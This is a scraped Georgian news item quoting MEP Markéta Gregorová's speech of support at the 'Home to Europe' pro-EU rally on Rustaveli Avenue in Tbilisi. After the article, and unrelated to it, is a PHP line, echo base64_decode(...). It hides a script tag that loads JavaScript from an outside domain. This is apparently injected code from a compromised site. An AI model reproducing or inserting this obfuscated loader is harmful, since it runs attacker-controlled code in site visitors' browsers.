celsiusi
ავერსი შნაიდერი
"თქვენ იმსახურებთ ევროკავშირის წევრობას. ყოველთვის გახსოვდეთ, თქვენ უკან ვდგავართ რთულ პერიოდშიც და მაშინაც, როდესაც გაკრიტიკებთ" - ასე მიმართავს ევროპარლამენტარი მარკეტა გრეგოროვა რუსთაველის გამზირზე მიმდინარე აქციაზე "შინ ევროპისკენ" შეკრებილ ქართველ ხალხს. 
 
"გამარჯობა. ჩემთვის ესაა მომავალი. დღეს მოხვედით, რომ აჩვენოთ, რა გსურთ მომავალში. ვფიქრობ, რომ იგივე გსურთ. გმადლობ, რომ ზრუნავთ, გმადლობ, რომ მოხვედით, მე სრულად გიჭერთ მხარს და ვზრუნავ თქვენს ევროპულ მომავალსა და ევროპულ მისწრაფებაზე. ნამდვილად ვფიქრობ, რომ თქვენ არამხოლოდ უნდა მიიღოთ კანდიდატის სტატუსი, არამედ უნდა ილაპარაკოთ თქვენზე, როგორც ქვეყანაზე, როგორც ხალხზე. თქვენ იმსახურებთ ევროკავშირის წევრობას. რა თქმა უნდა, კარგად იცით, რომ ჩვენ კრიტიკულები ვართ თქვენი მთავრობის მიმართ, საქართველოში არსებული ვითარების მიმართ. მაგრამ ეს არ ცვლის ამას. ჩვენს ურთიერთობებს, ჩვენს სურვილს პროგრესს მიაღწიოთ, რომ შეძლოთ ჩვენი, ევროკავშირის ნაწილი გახდეთ. ყოველთვის გახსოვდეთ, თქვენ უკან ვდგავართ რთულ პერიოდშიც და მაშინაც, როდესაც გაკრიტიკებთ. ამიტომ, დარჩით ძლიერები, პროევროპელი იდეალისტები. დღეს ისეთივე მნიშვნელოვანია თქვენთვის, როგორც ჩემთვის," - ამბობს გრეგოროვა. 
 
 
548
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");